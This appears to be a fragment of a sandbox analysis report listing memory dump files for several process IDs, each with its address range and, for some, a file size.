memory/1748-57-0x0000000000400000-0x000000000073B000-memory.dmpFilesize
3.2MB
-
memory/1748-54-0x0000000076091000-0x0000000076093000-memory.dmpFilesize
8KB
-
memory/1748-60-0x0000000000400000-0x000000000073B000-memory.dmpFilesize
3.2MB
-
memory/1748-68-0x0000000000400000-0x000000000073B000-memory.dmpFilesize
3.2MB
-
memory/1748-59-0x0000000000230000-0x0000000000236000-memory.dmpFilesize
24KB
-
memory/1772-75-0x0000000000000000-mapping.dmp
-
memory/1928-83-0x0000000000000000-mapping.dmp
-
memory/1968-81-0x0000000000000000-mapping.dmp
-
memory/1984-79-0x0000000000000000-mapping.dmp